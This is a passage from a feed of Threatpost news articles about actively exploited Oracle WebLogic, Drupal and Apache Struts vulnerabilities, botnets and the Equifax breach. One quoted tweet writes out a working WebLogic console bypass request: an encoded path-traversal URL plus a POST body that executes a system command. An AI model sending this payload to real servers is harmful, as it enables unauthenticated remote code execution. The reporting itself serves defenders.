servers and other types of Java programs. According to ZDI, crafted data in a T3 protocol message can trigger the deserialization of untrusted data \u2013 allowing an attacker to execute code in the context of the current process.\n\nThe second variant of the flaw exists within [the Oracle Coherence library](<https://www.zerodayinitiative.com/advisories/ZDI-20-570/>), Oracle\u2019s in-memory data grid and distributed caching solution.\n\n\u201cThe issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data,\u201d according to ZDI. \u201cAn attacker can leverage this vulnerability to execute code in the context of the service account.\u201d\n\nAffected versions of WebLogic Server include versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n\nOracle did not disclose further details about how many were targeted or the attackers behind the hacks.\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-04T14:57:51", "type": "threatpost", "title": "Oracle: Unpatched Versions of WebLogic App Server Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2883"], "modified": "2020-05-04T14:57:51", "id": "THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2", "href": "https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T22:18:34", "description": "If an organization hasn\u2019t updated their Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: \u201cAssume it has been compromised.\u201d\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. According to Oracle, the attack is \u201clow\u201d in complexity, requires no privileges and no user interaction and can be exploited by attackers with network access via HTTP.\n\nThe flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe October update was released Oct. 21. Fast forward to this week, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said on Thursday that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\n\u201cAt this point, we are seeing the scans slow down a bit,\u201d said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). \u201cBut they have reached \u2018saturation\u2019 meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.\u201d\n\nUllrich said, the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by \u201cJang,\u201d who described how to leverage the flaw to achieve remote code execution via only one GET request. Below is a proof of concept (POC) video.\n\nUllrich said, exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.\n\nUllrich[ and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. Users can find a patch availability document for WebLogic and other vulnerable Oracle products, [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T14:49:58", "type": "threatpost", "title": "Oracle WebLogic Server RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14882"], "modified": "2020-10-29T14:49:58", "id": "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "href": "https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-03T14:35:34", "description": "Oracle has released a rare out-of-band patch for a remote code-execution flaw in several versions of its WebLogic server.\n\nThe vulnerability ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMW>)) has a CVSS base score of 9.8 out of 10, and is remotely exploitable without authentication (meaning it may be exploited over a network without the need for a username and password).\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible after they have applied the October 2020 Critical Patch Update,\u201d according to Eric Maurice, director of security assurance at Oracle, [in a Sunday advisory](<https://blogs.oracle.com/security/security-alert-cve-2020-14750-released>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile specific details of the flaw were not disclosed, Oracle\u2019s alert said it exists in the Console of the Oracle WebLogic Server and can be exploited via the HTTP network protocol. A potential attack has \u201clow\u201d complexity and no user interaction is required, said Oracle.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Affected versions of WebLogic Server include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n> Oracle released an out-of-band security alert to address a vulnerability\u2014CVE-2020-14750\u2014in Oracle WebLogic Server. Patch ASAP! <https://t.co/34wm2YYgnx> [#Cyber](<https://twitter.com/hashtag/Cyber?src=hash&ref_src=twsrc%5Etfw>) [#Cybersecurity](<https://twitter.com/hashtag/Cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#InfoSec](<https://twitter.com/hashtag/InfoSec?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 US-CERT (@USCERT_gov) [November 2, 2020](<https://twitter.com/USCERT_gov/status/1323343180218195969?ref_src=twsrc%5Etfw>)\n\nOracle said that the vulnerability \u201cis related to\u201d CVE-2020-14882, which is also a remote code-execution flaw in WebLogic Servers. CVE-2020-14882 was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\nSecurity experts on Twitter [have pointed to](<https://twitter.com/breditor/status/1323435478218022913>) the fact that the fix for CVE-2020-14882 could be bypassed by merely changing the case of a character in their request. This would thus sidestep the path-traversal blacklist that was implemented to block the flaw, bypassing the patch.\n\n> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2020\u201314882 Weblogic Unauthorized bypass RCE \nhttp://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal\n> \n> POST:\n> \n> _nfpb=true&_pageLabel=&handle=<https://t.co/jBUfUasQC1>.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)<https://t.co/nU8xkK30DU> [pic.twitter.com/uLiggjHnQG](<https://t.co/uLiggjHnQG>)\n> \n> \u2014 Jas502n (@jas502n) [October 28, 2020](<https://twitter.com/jas502n/status/1321416053050667009?ref_src=twsrc%5Etfw>)\n\nUpon further analysis of the bypass, \u201cThe web application is making an authorization decision based on the requested path but it is doing so without first fully decoding and canonicalizing the path,\u201d said Craig Young, security researcher with Tripwire, [in an analysis](<https://www.tripwire.com/state-of-security/vert/actively-exploited-weblogic-vulnerability/>). \u201cThe result is that a URL can be constructed to match the pattern for a permitted resource but ultimately access a completely different resource.\u201d\n\n[While the patch for CVE-2020-14882 was released](<https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/>) during an Oct. 21 update, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said last week that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\nOracle WebLogic servers continue to be hard-hit with exploits. In May, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the [REvil/Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code-execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T13:57:26", "type": "threatpost", "title": "Oracle Rushes Emergency Fix for Critical WebLogic Server Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-11-03T13:57:26", "id": "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "href": "https://threatpost.com/oracle-update-weblogic-server-flaw/160889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of 